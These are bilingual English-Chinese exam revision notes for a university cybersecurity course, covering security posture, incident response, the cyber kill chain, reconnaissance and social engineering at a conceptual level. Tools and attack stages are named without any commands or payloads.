CSIT302 网络安全 — 考试复习笔记

Bilingual notes (English / 中文) organized by lecture. 双语笔记（英文 / 中文），按课件章节整理。

Day 1-1 — Security Posture / 安全态势

1. What is Cybersecurity? / 什么是网络安全？

Definition (E. Lewis): A set of technologies, practices and processes designed to safeguard programs, network systems, software and virtual data against invasion or damage. 定义（E. Lewis）： 一套旨在保护程序、网络系统、软件和虚拟数据免受入侵或破坏的技术、实践和流程。

Cybersecurity is a broad area encompassing:

Computer security / 计算机安全
Network security / 网络安全
Software/hardware security / 软硬件安全

Cyberattacks are malicious activities in cyberspace — the reason we need cybersecurity. 网络攻击是发生在网络空间中的恶意活动，也是我们需要网络安全的原因。

Cybersecurity has moved from nice-to-have to must-have for organizations. 网络安全对组织来说已从"锦上添花"变成了"必不可少"。

Failure in cybersecurity can result in irrevocable damage or even bankruptcy. 网络安全失败可能导致不可挽回的损失甚至破产。

Real-world examples / 真实案例：

British Airways: £183m GDPR fine for credit card data breach (2018) 英国航空：因信用卡数据泄露被罚款1.83亿英镑（GDPR首例，2018年）
MtGox: Lost 850,000 bitcoins and bankrupted (2014) MtGox：损失85万枚比特币后破产（2014年）
Optus (Australia): 10 million customers affected (Sep 2022) 澳大利亚Optus：1000万客户受影响（2022年9月）
Medibank (Australia): 9.7 million customers affected (Dec 2022) 澳大利亚Medibank：970万客户受影响（2022年12月）

2. Goals of Cybersecurity / 网络安全的目标

Term / 术语	Definition / 定义
Secrecy / 保密性	Effect of mechanisms (e.g., cryptography, access control) to limit who can access info. 通过密码学、访问控制等机制限制能访问信息的主体数量。
Confidentiality / 机密性	Obligation to protect another person's or organisation's secrets. 对所知晓的他人或组织秘密的保护义务。
Privacy / 隐私	The right to protect personal information and prevent invasion of personal space. 保护个人信息、防止个人空间被侵犯的权利。

Key distinction:

Privacy = secrecy for the benefit of the individual 隐私 = 为个人利益的保密
Confidentiality = secrecy for the benefit of the organisation 机密性 = 为组织利益的保密

3. Security Posture / 安全态势

Security posture = Protection + Detection + Response 安全态势 = 保护 + 检测 + 响应

Solidifying protection alone is not enough. 仅靠加固防护是不够的。

Enhance detection to quickly identify an attack. 强化检测，以快速识别攻击。
Enhance response to reduce time between infection and containment. 强化响应，缩短从感染到遏制的时间。

4. The Current Threat Landscape / 当前威胁格局

Remote Access & BYOD / 远程访问与自带设备

The threat landscape expands as organizations allow remote access and BYOD (Bring Your Own Device). 随着组织允许远程访问和BYOD（自带设备），威胁面持续扩大。

BYOD failures usually result from poor planning and network architecture. BYOD失败通常源于规划不足和网络架构不安全。

4 Key Entry Points / 4个关键入侵入口

Between On-premises and Cloud / 本地资源与云之间
Between BYOD devices and Cloud / BYOD设备与云之间
Between On-premises and BYOD / 本地资源与BYOD之间
Between Cloud and Personal devices / 云与个人设备之间

Cloud Computing Services / 云计算服务

Type / 类型	Description / 描述	Examples / 示例
IaaS (Infrastructure as a Service)	Scalable computing resources (VMs, storage, networking) / 可扩展的计算资源（虚拟机、存储、网络）	AWS EC2, Azure, Google Compute Engine
PaaS (Platform as a Service)	Full environment for app development & deployment / 完整的应用开发与部署环境	AWS Beanstalk, Heroku
SaaS (Software as a Service)	Software licensed via subscription, hosted in cloud / 订阅制、托管于云端的软件	Office365, Google Docs, Dropbox

Caution: When adopting IaaS/PaaS, organizations must perform risk assessment to evaluate threats and countermeasures. 注意： 采用IaaS/PaaS时，组织必须进行风险评估，评估威胁和对策。

SaaS risk: A compromised personal device can leak corporate data if the user: SaaS风险： 若个人设备被攻破，在以下情况下可能泄露企业数据：

Opens corporate email / 在该设备上打开企业邮件
Accesses corporate SaaS apps / 访问企业SaaS应用
Reuses the same password for personal and corporate accounts / 个人与企业账户使用同一密码

Main protection: Security awareness training / 主要防护手段：安全意识培训

5. The Credential / 凭证安全

A user's identity is the new perimeter. Stealing credentials is the preferred attack vector of cybercriminals. 用户身份是新的安全边界。窃取凭证是网络犯罪分子最常用的攻击手段。

Credential theft → privilege escalation → domain administrator compromise 凭证窃取 → 权限提升 → 域管理员权限被攻破

Defenses / 防御手段：

Account policy enforcement / 账户策略强制执行
MFA (Multi-Factor Authentication): Uses multiple factors (password + OTP + biometrics such as fingerprint, iris, face, voice) MFA（多因素认证）： 使用多种因素（密码 + 一次性密码 + 生物特征如指纹、虹膜、面部、声音）
Continuous monitoring (continuous authentication): Verifies identity throughout a session using behavioural analysis, not just at login. 持续监控（持续认证）： 在整个会话过程中通过行为分析持续验证身份，而不仅仅在登录时验证。

6. Applications (Apps) / 应用程序

Applications are entry points for users to consume, transmit, process or store data. 应用程序是用户消费、传输、处理或存储数据的入口。

App Type / 应用类型	Security Consideration / 安全考虑
In-house developed apps / 内部开发的应用	Use a secure framework throughout the software development lifecycle / 在整个软件开发生命周期中使用安全框架
Third-party SaaS apps / 第三方SaaS应用	Check vendor's security and compliance policy / 审查供应商的安全与合规政策
Personal apps on BYOD / BYOD上的个人应用	May not be secure / 可能不安全

Shadow IT: Systems developed by departments outside central IT — lacks visibility for IT managers. 影子IT： 由非中央IT部门开发的系统，IT管理员无法掌握其使用情况。

"You can't protect something you don't know you have." "你无法保护你不知道自己拥有的东西。"

7. Examples of Threats and Countermeasures / 威胁与对策示例

State / 数据状态	Threat / 威胁	Countermeasure / 对策
Data at rest on user's device / 静态数据（用户设备）	Unauthorized/malicious process reads or modifies data / 未授权或恶意进程读取或修改数据	Data encryption (file-level or disk) / 数据加密（文件级或磁盘级）
Data in transit / 传输中的数据	Man-in-the-middle attack (read/modify/hijack) / 中间人攻击（读取/修改/劫持）	SSL/TLS with valid certificates / 使用有效证书的SSL/TLS
Data at rest on-premise or cloud / 静态数据（本地或云端）	Unauthorized/malicious process reads or modifies data / 未授权或恶意进程读取或修改数据	Data encryption (file-level or disk) / 数据加密（文件级或磁盘级）

8. Cybersecurity Challenges / 网络安全挑战

Top Causes of Costly Data Breaches (in order) / 最昂贵数据泄露的主要原因（按序）

Malware (viruses and Trojans) / 恶意软件（病毒和木马）
Lack of diligence and untrained employees / 员工疏忽和缺乏培训
Phishing and social engineering / 钓鱼攻击和社会工程学
Targeted attack / 定向攻击
Ransomware / 勒索软件
Government-sponsored attack / 国家支持的攻击

Causes 1–3 are correlated to human error. 第1–3项均与人为错误密切相关。

Humans are considered the weakest link in cybersecurity. 人被认为是网络安全中最薄弱的环节。

Targeted Attack (4) / 定向攻击

Attacker has a specific target and performs public reconnaissance first. 攻击者有明确目标，首先进行公开侦察。
Key attribute: longevity — maintains persistent access and moves laterally across the network. 关键特征：持久性 — 长期保持访问权限并横向移动穿越网络。

Ransomware (5) — WannaCry / 勒索软件

WannaCry (May 2017): infected 400,000+ machines globally. WannaCry（2017年5月）：全球感染超过40万台机器。
Exploited Windows SMBv1 vulnerability (EternalBlue); patch had been available for 59 days before the attack. 利用Windows SMBv1漏洞（EternalBlue）；补丁在攻击前59天已发布。
Shows organizations fail to implement effective vulnerability management programs. 说明各组织未能有效实施漏洞管理计划。

Government-Sponsored Attacks (6) / 国家支持的攻击

Intent: steal information to use as a weapon against the victim. 目的：窃取信息，将其作为武器用于对抗受害方。
Response: invest in threat intelligence, machine learning, and analytics. 应对：投资威胁情报、机器学习和数据分析。

9. The Red and Blue Team / 红蓝队

Overview / 概述

Team / 队伍	Role / 职责
Red Team	Performs attack / penetration testing — tries to break through current security controls. 执行攻击/渗透测试，尝试突破现有安全控制。
Blue Team	Ensures assets are secure; detects, remediates, and documents breaches. 确保资产安全；检测、修复并记录安全事件。

Red Team Metrics / 红队指标

MTTC (Mean Time to Compromise): Time from attack initiation to successful compromise. MTTC（平均攻破时间）： 从发起攻击到成功攻破目标的时间。
MTPE (Mean Time to Privilege Escalation): Time from attack initiation to gaining admin privilege. MTPE（平均权限提升时间）： 从发起攻击到获得管理员权限的时间。

Blue Team Metrics / 蓝队指标

ETTD (Estimated Time to Detection): Time to detect the attack. ETTD（预估检测时间）： 检测到攻击所需时间。
ETTR (Estimated Time to Recovery): Time to recover from the breach. ETTR（预估恢复时间）： 从安全事件中恢复所需时间。

Note: These metrics are not 100% precise — Blue Team may not know exactly when compromise occurred. 注意：这些指标并非100%精确 — 蓝队可能无法确切知道何时发生了攻破。

Blue Team Response Steps / 蓝队响应步骤

Save evidence / 保存证据
Validate the evidence → catalogue as IoC (Indication of Compromise) / 验证证据 → 记录为入侵指标（IoC）
Engage relevant teams / 联系相关团队
Triage the incident (may involve law enforcement) / 分流事件（可能涉及执法机构）
Scope the breach / 界定事件范围
Create a remediation plan (isolate or evict the adversary) / 制定补救计划（隔离或驱逐攻击者）
Execute the plan and recover / 执行计划并恢复

10. Assuming Breach / 假设已遭攻破

"Fundamentally, if somebody wants to get in, they're getting in. Alright, good. Accept that." "从根本上说，如果有人想进来，他们就会进来。好吧，接受这个现实。" — Michael Hayden (former director of CIA and NSA / 前CIA和NSA局长)

Modern approach: shift from "prevent breach" to "assume breach". 现代方法：从**"防止攻破"转变为"假设已遭攻破"**。

Traditional "prevent breach" does not promote ongoing testing. 传统的"防止攻破"方法不能促进持续测试。
Red/Blue team simulation must be a continuous process, not a one-off exercise. 红蓝队模拟必须是持续的过程，而非一次性演练。

Workflow: Red Team → Attack Simulation → Blue Team → Post Breach → Monitoring Emerging Threats 流程：红队 → 攻击模拟 → 蓝队 → 事后分析 → 监控新兴威胁

Day 1-2 — Incident Response Process / 事件响应流程 & Cybersecurity Kill Chain / 网络安全杀伤链

1. Introduction to IR Process / 事件响应流程简介

IR process relates to Detection and Response in the security posture. IR流程对应安全态势中的检测和响应两个维度。

Detection: how to handle security incidents / 如何处理安全事件
Response: how to rapidly respond to them / 如何快速响应事件

Many companies have an IR process but fail to constantly review it to incorporate lessons learned. 许多公司有IR流程，但未能持续审查以纳入经验教训。

No IR process results in: 缺乏IR流程的后果：

Bad security posture / 安全态势差
Waste of human resources / 浪费人力资源

Requirements for a successful IR process / 成功IR流程的要求：

All IT personnel trained to handle security incidents / 所有IT人员均接受安全事件处理培训
All users trained on core security fundamentals / 所有用户了解安全基础知识
Integration between help desk and IR team / 服务台与IR团队的整合
Good sensors (IDS): Network sensors + Host sensors / 良好的传感器（入侵检测系统）：网络传感器 + 主机传感器
IR process must be compliant with laws and regulations / IR流程必须符合法律法规

2. Creating an IR Process — Foundational Areas / 建立IR流程 — 基础要素

Foundational Area / 基础要素	Description / 说明
Objective / 目标	Clearly define the purpose; everyone must know what the process aims to accomplish. 清晰定义目的；所有人都应了解该流程的目标。
Scope / 范围	Define to whom it applies (company-wide vs departmental). 定义适用对象（全公司或部门级）。
Definition / Terminology / 定义/术语	Define what constitutes a security incident; create a company glossary. 定义安全事件的构成；建立公司词汇表。
Roles and responsibilities / 角色与职责	Define who has authority (e.g., to confiscate a computer); make entire company aware. 定义有权执行操作的人员（如没收电脑）；全公司知晓。
Priorities / Severity Level / 优先级/严重级别	Based on: functional impact, type of info affected, recoverability. 基于：对业务的功能影响、受影响信息类型、可恢复性。

Also define interaction with third parties, partners and customers. 同时需定义与第三方、合作伙伴和客户的交互规则。

3. Incident Response Team / 事件响应团队

Size and composition varies by company size, budget and purpose. 规模与组成因公司规模、预算和目的而异。
Members need technically broad knowledge with deep expertise in specific areas. 成员需具备宽泛技术知识并在特定领域有深度专长。
Budget must cover: tools, hardware, and training programs. 预算需涵盖：工具、硬件和培训计划。
Outsourcing is an option when finding qualified staff is difficult; requires a well-defined SLA (Service-Level Agreement). 当招募合适人员困难时可选择外包；需签订明确的服务水平协议（SLA）。

End Users' Roles / 终端用户的职责

Identify and report security incidents / 识别并报告安全事件
Know how to create an incident ticket / 知道如何创建事件工单
Attend security awareness training / 参加安全意识培训

When the end user cannot reproduce the issue, ensure: 当终端用户无法复现问题时，确保以下措施到位：

System and network profiles / 系统和网络配置文件
Log-retention policy / 日志保留策略
Clock synchronization (NTP) across all systems / 所有系统的时钟同步（NTP）

4. NIST Incident Response Process / NIST事件响应流程

4 Phases (循环迭代): Preparation → Detection & Analysis → Containment, Eradication & Recovery → Post-Incident Activity 4个阶段（循环迭代）：准备 → 检测与分析 → 遏制、清除与恢复 → 事后活动

Phase 1: Preparation / 准备阶段

Implement security controls from initial risk assessment. 根据初始风险评估部署安全控制措施。
Deploy endpoint protection, malware protection, network security. 部署端点保护、恶意软件防护和网络安全。
Not static — continuously updated from post-incident feedback. 非静态 — 持续接受事后活动反馈进行更新。

Phase 2: Detection & Analysis / 检测与分析阶段

Detection system must know attack vectors and dynamically learn new threats. 检测系统必须了解攻击向量并动态学习新威胁。
Leverage security intelligence and advanced analytics to reduce false positives. 利用安全情报和高级分析减少误报。
Detection and analysis are often done in parallel (attack may still be ongoing). 检测与分析常并行进行（攻击可能仍在进行中）。

IoC (Indication of Compromise) identification sources / 入侵指标（IoC）识别来源：

Log Source / 日志来源	Detects / 可检测内容
Endpoint protection & OS logs / 端点保护和操作系统日志	Phishing email, lateral movement / 钓鱼邮件、横向移动
Server logs & network captures / 服务器日志和网络捕获	Unauthorized or malicious process / 未授权或恶意进程
Firewall log & network capture / 防火墙日志和网络捕获	Data extraction and submission / 数据提取和提交

Data gathered for court use must guarantee data integrity. 用于法庭的数据必须保证数据完整性。

Phase 3: Containment / 遏制阶段

Short-term containment: isolate the affected network segment. 短期遏制： 隔离受威胁的网络段。
Long-term containment: temporary adjustments to keep systems in production while rebuilding clean systems. 长期遏制： 临时调整以保持生产运行，同时重建干净系统。

Phase 3: Eradication / 清除阶段

Remove malware from all infected devices. 从所有受感染设备上清除恶意软件。
Acknowledge the root cause and take steps to avoid similar attacks. 确认根本原因并采取措施避免类似攻击。

Phase 3: Recovery / 恢复阶段

Put affected production systems back online to avoid further attacks. 将受影响的生产系统重新上线以避免进一步攻击。
Test, check, and track affected systems to ensure normal operation. 测试、检查和追踪受影响系统以确保正常运行。

Phase 4: Post-Incident Activity / 事后活动阶段

Documenting Lessons Learned / 记录经验教训：

Most valuable piece of information in this phase / 本阶段最有价值的信息
Must include full timeline of the incident / 必须包含事件的完整时间线
Helps refine the process by identifying gaps and areas of improvement / 通过识别差距和改进点持续完善流程

Lessons learned must answer / 经验教训必须回答：

Who identified the issue (user or detection system)? / 谁发现了问题（用户还是检测系统）？
Was the incident opened with the right priority? / 事件是否以正确优先级处理？
Were the initial assessment, data analysis, containment, eradication and recovery done correctly? / 初始评估、数据分析、遏制、清除和恢复是否正确执行？
How long did it take to resolve? / 解决花了多长时间？

Evidence retention / 证据保留：

All artifacts stored per company's retention policy / 所有证据按公司保留策略存储
Evidence kept intact until legal actions are settled / 证据保持完整直至法律行动完结

5. Incident Response in the Cloud / 云端事件响应

Cloud IR is a shared responsibility between cloud provider and the company. 云端IR是云提供商与企业之间的共同责任。

Model / 模型	Company's Responsibility / 企业责任	Cloud Provider Responsibility / 云端责任
IaaS	Full control of VM and OS logs / 完全控制VM和操作系统日志	Underlying network infrastructure and hypervisor logs / 底层网络基础设施和虚拟机管理程序日志
SaaS	Review SLA for rules of engagement / 审查SLA了解参与规则	Possesses majority of IR-relevant data / 持有大部分IR相关数据 → contact provider directly / 直接联系提供商

Updating IR for Cloud / 云端IR更新要点：

Preparation: add cloud provider contact info / 添加云提供商联系信息
Detection: include cloud provider detection solutions / 纳入云端检测方案
Containment: use cloud capabilities to isolate (e.g., isolate compromised VM) / 利用云端能力隔离（如隔离受攻击VM）

6. Threat Life Cycle Management / 威胁生命周期管理

Specifies Detection and Containment from NIST IR process with 6 phases. 对NIST IR流程中的检测与遏制进行细化，共6个阶段。

84% of all attacks left evidence in log data — with proper tools these could have been mitigated early. 84%的攻击在日志数据中留有痕迹 — 借助适当工具可提前缓解。

6 Phases / 6个阶段

Phase / 阶段	Key Points / 要点
1. Forensic Data Collection / 取证数据收集	Collect from 7 IT domains (User, Workstation, LAN, LAN-to-WAN, Remote Access, WAN, System/Application). Security event data + log data + forensic sensor data. 从7个IT域收集数据。安全事件数据 + 日志数据 + 取证传感器数据。
2. Discovery / 发现	Search analytics (labour-intensive, software-aided) + Machine analytics (automated ML-based scanning). 搜索分析（人工密集，软件辅助）+ 机器分析（基于ML的自动化扫描）。
3. Qualification / 鉴定	Assess threats for potential impact, urgency, mitigation method. False positives are a big challenge — waste of resources. 评估威胁的潜在影响、紧迫性和缓解方法。误报是一大挑战——浪费资源。
4. Investigation / 调查	Fully investigate qualified threats; check for damage done before detection; mostly automated. 全面调查已鉴定的威胁；检查检测前已造成的损害；大部分自动化。
5. Neutralization / 消除	Eliminate or reduce threat impact; automated process for higher throughput and collaboration. 消除或降低威胁影响；自动化流程提高效率和协作。
6. Recovery / 恢复	Restore org to pre-attack state; use automated recovery tools; ensure no backdoors remain. 将组织恢复到受攻击前的状态；使用自动化恢复工具；确保无后门残留。

7. Cybersecurity Kill Chain / 网络安全杀伤链

Origin: Military concept (target ID → troop dispatch → attack order → target destruction). 起源： 军事概念（目标识别 → 部队调遣 → 攻击命令 → 目标摧毁）。

Cybersecurity Kill Chain: Adapted by Lockheed Martin to model intrusions on computer networks. 网络安全杀伤链： 由洛克希德·马丁改编，用于建模计算机网络入侵模型。

Attack Phases / 攻击阶段

Step 1: External Reconnaissance / 外部侦察

Harvest information from outside the target's network (supply chain, obsolete devices, social media). 从目标网络外部收集信息（供应链、废旧设备、社交媒体）。
Common technique: Social engineering / 社会工程学
- Phishing: crafted emails to reveal secrets or install malware / 精心设计的邮件诱使泄露秘密或安装恶意软件
- Claim to be from reputable institutions / 声称来自可信机构

Step 2: Compromising the System / 攻破系统

Entry via stolen passwords (direct access to internal network) or malware infection (spread to more machines). 通过盗取密码（直接访问内网）或恶意软件感染（传播至更多设备）获得入口。

Step 3: Lateral Movement / 横向移动

Popular attack frameworks / 常用攻击框架：

Metasploit / Kali Linux: Linux-based hacking framework / 基于Linux的黑客框架

Password cracking tools / 密码破解工具：

John the Ripper, THC Hydra, Cain and Abel: support brute force or dictionary attacks / 支持暴力破解或字典攻击

Network scanning tools / 网络扫描工具：

Tool / 工具	Purpose / 用途
Wireshark	Capture data packets in network / 捕获网络数据包
Nmap	Free open-source network mapping tool / 免费开源网络映射工具
Aircrack-ng	Wireless hacking suite (FMS/KoreK/PTW attacks on WEP/WPA) / 无线黑客套件（针对WEP/WPA的FMS/KoreK/PTW攻击）
Kismet	Wireless network sniffer and IDS / 无线网络嗅探器和入侵检测系统
OWASP Zap	Website vulnerability scanner / 网站漏洞扫描器

Step 4: Access and Privilege Escalation / 访问与权限提升

Type / 类型	Description / 描述	Method / 方法
Vertical privilege escalation / 垂直权限提升	Move to account with higher authority (admin/superuser) / 提升至更高权限账户（管理员/超级用户）	Buffer overflow (e.g., EternalBlue for WannaCry) / 缓冲区溢出（如WannaCry的EternalBlue）
Horizontal privilege escalation / 水平权限提升	Access other accounts with same authority level / 访问同级权限的其他账户	Session/cookie theft, XSS, weak passwords, keylogging / 会话/Cookie盗取、XSS、弱密码、键盘记录

Result of escalation / 权限提升的结果：

Attacker has remote access entry points / 攻击者获得远程访问入口
Access to multiple user accounts / 访问多个用户账户
Knows how to evade detection / 知晓如何规避检测

Step 5: Concluding the Mission / 完成任务

Exfiltration / 数据窃取：

Extract sensitive data: trade secrets, credentials, PII, documents / 提取敏感数据：商业秘密、凭证、个人身份信息、文件
Examples: Ashley Madison (2015), Yahoo (2013/2016), LinkedIn (2016)
Data may be sold, erased, or modified / 数据可能被出售、删除或篡改

Sustainment / 持续潜伏：

Remain silent after exfiltration; install rootkits for persistent access / 窃取后保持静默；安装rootkit以维持持久访问
Maintains multiple access points — closing one doesn't remove access / 维持多个访问点 — 关闭一个不影响访问

Assault / 攻击破坏：

Most feared stage: permanently damage data, software, and hardware / 最可怕阶段：永久破坏数据、软件和硬件
Example: Stuxnet — first digital weapon against physical infrastructure; spread via USB drive to air-gapped Iranian nuclear facility 示例：Stuxnet — 首个针对物理基础设施的数字武器；通过U盘传播至与互联网隔离的伊朗核设施

Obfuscation / 混淆掩踪：

Attackers cover their tracks to confuse/divert forensic investigation / 攻击者掩盖踪迹以混淆/转移取证调查
Techniques: using outdated servers as pivot points, free WiFi, dynamic code obfuscation (bypasses signature-based AV/firewall) / 技术：使用过时服务器作为跳板、免费WiFi、动态代码混淆（绕过基于签名的防病毒/防火墙）

Day 1-3 — Reconnaissance & Compromising the System / 侦察与攻破系统

1. Reconnaissance / 侦察

Definition / 定义： A military term — "sending spies into an enemy's territory to gather data about where and when to strike." 军事术语——"派遣间谍进入敌方领土，收集何时何地发动攻击的情报"。

In cybersecurity, reconnaissance is one of the most important stages of an attack life cycle. 在网络安全中，侦察是攻击生命周期中最重要的阶段之一。

Attackers search for vulnerabilities and gather data to identify loopholes in a target's network, users, or computing systems. 攻击者搜索漏洞，收集数据，识别目标网络、用户或计算机系统中的缺陷。

If done right, the target will not know reconnaissance has been performed. 如果侦察做得好，目标将不会察觉已被侦察。

Two types / 两种类型： External（外部） and Internal（内部）— main focus is External.

2. External Reconnaissance / 外部侦察

Done outside the organization's network; focuses on exploiting the carelessness of users. 在组织网络外部进行；主要利用用户的疏忽大意。

2.1 Dumpster Diving / 垃圾箱搜寻

Organizations dispose of obsolete devices via bidding, recyclers, or storage dumps — posing serious security risks. 组织通过竞拍、回收商或堆放报废设备，带来严重安全隐患。

Information attackers can obtain / 攻击者可获取的信息：

Internal setup of the organization / 组织内部架构
Openly-stored passwords on browsers / 浏览器中明文存储的密码
Privileges and details of different users / 各用户的权限和详细信息
Access credentials to bespoke systems / 访问专用系统的凭证

Secure disposal methods / 安全销毁方法：

Degaussing（消磁）: Reduces/eliminates magnetic field on HDD/tape. Does not work for SSD. / 消除硬盘/磁带中的磁场，不适用于SSD。
Deleting via software is generally NOT secure / 软件删除通常不安全。
SSD secure disposal / SSD安全销毁： Encrypt with a long random key → forget the key → format the disk. / 用长随机密钥加密 → 丢弃密钥 → 格式化磁盘。
Google's approach / Google做法： Crushes hard drives with steel pistons, rendering them unreadable. / 用钢活塞穿透硬盘使其不可读。

The easiest way to gather a huge amount of information about people. 收集大量个人信息的最简便方式。

Data attackers can mine / 攻击者可挖取的数据：

Companies users work for / 用户所在公司
Family members, relatives, friends, residence and contact info / 家庭成员、亲属、朋友、居住地和联系方式
Passwords / secret question answers (DOB, pet name, school, street) / 密码/安全问题答案（生日、宠物名、学校、街道）

Identity theft via social media / 社交媒体上的身份盗窃：

Create a fake account with victim's photos and details / 用受害者照片和信息创建假账号
Use it to request network info, security info from IT departments / 冒充他人向IT部门索取网络信息和安全信息

Tips to stay safe / 防护建议：

Use strong, frequently-changed passwords / 使用强密码并经常更换
Enter as little personal info as possible in apps / 在应用中尽量少填写个人信息
Never post SSN, IC, current address, or phone number / 切勿在网上发布身份证号、现址或电话
Keep privacy settings at highest level / 将隐私设置调至最高级别
Avoid downloading free social media apps / 避免下载免费社交媒体应用
Verify links before clicking; Google your own name to track forged accounts / 点击链接前核实；谷歌搜索自己的名字以发现伪造账号

One of the most powerful reconnaissance techniques — beyond the protection of security tools. 最强大的侦察手段之一——超出安全工具的防护范围。

Exploits human nature: sympathy, trust, pride, obedience to authority. 利用人性弱点：同情心、信任感、虚荣心、对权威的服从。

Six Levers of Social Engineering / 社会工程学六大杠杆：

Lever / 杠杆	Description / 描述
Reciprocation / 互惠	Victim feels obligated to return a favour. 受害者感到有义务回报恩惠。
Scarcity / 稀缺	Threaten short supply of something the target needs (sale, product release). 威胁目标所需物品供应紧张（大促、新品）。
Consistency / 一致性	Humans honour promises or follow routine. Attackers clone known vendors to deliver malware. 人们倾向于遵守承诺。攻击者伪装成已知供应商发送含恶意软件的设备。
Liking / 喜好	Humans comply more with people they like or find attractive. 人们更易顺从自己喜欢或认为有吸引力的人。
Authority / 权威	Humans obey those ranked above them. Attackers impersonate superiors to request credentials. 人们服从上级权威。攻击者冒充上司索取登录凭证。
Validation / 认同	People do things if others are doing the same. 看到别人都在做，人们也会跟着做。

Popular Social Engineering Attack Types / 常见社会工程学攻击类型：

Attack / 攻击	Description / 描述
Pretexting / 借口攻击	Elaborate fabricated lie impersonating trusted figures (police, tax officials, managers). 精心编造谎言，冒充可信人物（警察、税务官员、经理）。
Diversion Theft / 转移盗窃	Persuade delivery companies to reroute deliveries elsewhere. 说服快递公司将货物改变投递地点。
Phishing / 钓鱼攻击	Fake emails pretending to be legitimate organizations with malicious links/attachments. 伪装成合法机构发送含恶意链接/附件的邮件。
Vishing (Phone Phishing) / 电话钓鱼	Fake IVR systems sounding like banks/service providers to extract PINs. 伪造银行/服务商语音系统以套取PIN码。
Spear Phishing / 鱼叉式钓鱼	Targeted phishing with background checks. Success rate: 70% vs normal phishing 3%. 针对特定目标进行背景调查后的定向钓鱼，成功率70%（普通钓鱼仅3%）。
Water Holing / 水坑攻击	Infect websites frequently visited by the target group; harder to detect due to specificity. 感染目标群体经常访问的网站；因针对性强更难被检测。
Baiting / 诱饵攻击	Leave malware-infected USB/storage in public places, exploiting victim's greed or curiosity. 在公共场所放置含恶意软件的USB，利用受害者的贪婪或好奇心。
Quid Pro Quo / 互惠攻击	Call random numbers offering technical support in exchange for access. Low success rate. 随机拨打电话以提供技术支持为由换取访问权。成功率较低。
Tailgating / 尾随进入	Physically follow an authorized employee through a secure entry. 跟随有权限员工通过门禁，借用RFID卡或伪造卡入内。

Typical signs of Phishing emails / 钓鱼邮件典型特征：

Asks for sensitive information / 索取敏感信息
Uses a different/suspicious domain / 使用不同或可疑域名
Contains link inconsistent with the domain / 链接与域名不一致
Not personalized / 没有个人化称呼
Poor spelling and grammar / 拼写和语法错误
Creates panic/urgency / 制造恐慌或紧迫感

3. Internal Reconnaissance / 内部侦察

Done on-site, within the organization's network, systems, and premises. 在组织网络、系统和场所内部进行。

Key difference from external / 与外部侦察的关键区别：

External: No interaction with target systems — exploits humans as entry points. 外部：不直接与系统交互——通过组织内的人员寻找入口。
Internal: Directly interacts with target systems to find vulnerabilities. 内部：直接与目标系统交互以发现漏洞。

Goals of internal reconnaissance / 内部侦察目标：

Locate data servers and IP addresses of hosts to infect / 定位数据服务器和可感染主机的IP地址
Determine security mechanisms in place / 了解部署的安全机制
Map network topology for future attacks / 为未来攻击绘制网络拓扑图

Sniffing and Scanning / 嗅探与扫描

Sniffing tools: Capture packets transmitted over a network for analysis. 嗅探工具： 捕获网络传输的数据包进行分析。

Tool / 工具	Description / 描述
Prismdump	Linux only; captures packets to pcap format using Prism2 chipset. 仅Linux；使用Prism2芯片卡嗅探，保存为pcap格式。
tcpdump	Powerful packet-filtering; can selectively capture packets. 强大的包过滤工具；可选择性捕获。
Wireshark	Most popular; user-friendly GUI with powerful packet interpretation. 最流行；用户友好的图形界面，强大的包解析能力。
Nmap	Maps hosts in a network; uses slow scanning to evade monitoring systems. 映射网络中的主机；使用慢速扫描规避监控系统。
Nessus	Best network/vulnerability scanner for white hats; detects misconfigurations, missing patches, weak/default passwords, and abnormal traffic. 白帽最佳网络/漏洞扫描器；检测配置错误、缺失补丁、弱/默认密码和异常流量。

Packet analysis is essential for internal reconnaissance. 数据包分析是内部侦察的核心手段。

4. Conclusion of Reconnaissance / 侦察阶段总结

After both stages, attackers have enough information to proceed or cancel a cyber-attack. 完成两个阶段后，攻击者掌握足够信息以决定是否发动网络攻击。

External recon → understands user behaviour and exploits it. 外部侦察 → 了解用户行为并加以利用。
Internal recon → learns about network vulnerabilities. 内部侦察 → 了解网络漏洞详情。

Result: Attackers can engage from two fronts — users' side OR network vulnerabilities. 结果：攻击者可从两个方向切入——用户侧或网络漏洞侧。

5. Compromising the System — Current Trends / 攻破系统——当前趋势

Hacking techniques become more sophisticated each year. 黑客技术每年都变得更加复杂。

5.1 Extortion Attacks / 勒索攻击

Ransomware (e.g., WannaCry): Demand $300 within 72 hours via Bitcoin; doubles after 7 days. WannaCry only made ~$50,000 due to kill switch discovery. 勒索软件（如WannaCry）： 要求72小时内通过比特币支付300美元；7天后翻倍。因被发现Kill Switch，WannaCry仅获利约5万美元。
Threatening to release data (e.g., Ashley Madison): After failed extortion, exposed 36 million user records; company paid $11 million compensation. 威胁公开数据（如Ashley Madison）： 勒索失败后公开3600万用户数据；公司赔偿1100万美元。
UAE Bank (2015): Demanded $3 million; bank refused → personal and transaction data released publicly. 阿联酋银行（2015年）： 勒索300万美元；银行拒绝 → 客户及交易数据被公开。

5.2 Data Manipulation Attacks / 数据篡改攻击

Instead of deleting or releasing data, hackers subtly change values — very difficult to detect. 攻击者不删除或公开数据，而是微妙地修改数值——极难被检测。
Even a single changed value can have far-reaching consequences (e.g., bank balance manipulation could take months/years to resolve). 仅修改单个数值可能产生深远影响（如银行余额篡改可能需数月/年才能排查清楚）。
AP Twitter hack: Hackers tweeted fake news about Dow dropping 150 points → deflated market by estimated $136 billion. 美联社Twitter被黑： 发布道指下跌150点的假新闻 → 市值损失估计1360亿美元。

5.3 Backdoors / 后门

Juniper Networks (2016): Backdoors found in firewall firmware that allowed attackers to decrypt traffic. 瞻博网络（2016年）： 防火墙固件中发现允许攻击者解密流量的后门。
Similarities to NSA's backdoor raised concerns about state-level threats. 与NSA已知后门的相似性引发对国家级威胁的担忧。
Hard to detect → expected to be extensively used in the future. 难以检测 → 预计未来将被大量利用。

5.4 IoT Device Attacks / 物联网设备攻击

IoT devices (smart appliances, baby monitors) are easier to access and inadequately protected. 物联网设备（智能家电、婴儿监视器）更易被访问且保护不足。
Manufacturers have not prioritized security; users leave devices with default configurations. 制造商未将安全性放在首位；用户维持默认配置不变。
Mirai attack: Commandeered large IoT device networks to generate DDoS (Distributed Denial of Service) traffic. Mirai攻击： 操控大量物联网设备发起**DDoS（分布式拒绝服务）**攻击。

5.5 Mobile Device Attacks / 移动设备攻击

Malicious activity targeting mobile devices doubled: 9M blocked (2015) → 18M blocked (2016). 针对移动设备的恶意活动翻倍：2015年拦截900万次 → 2016年拦截1800万次。
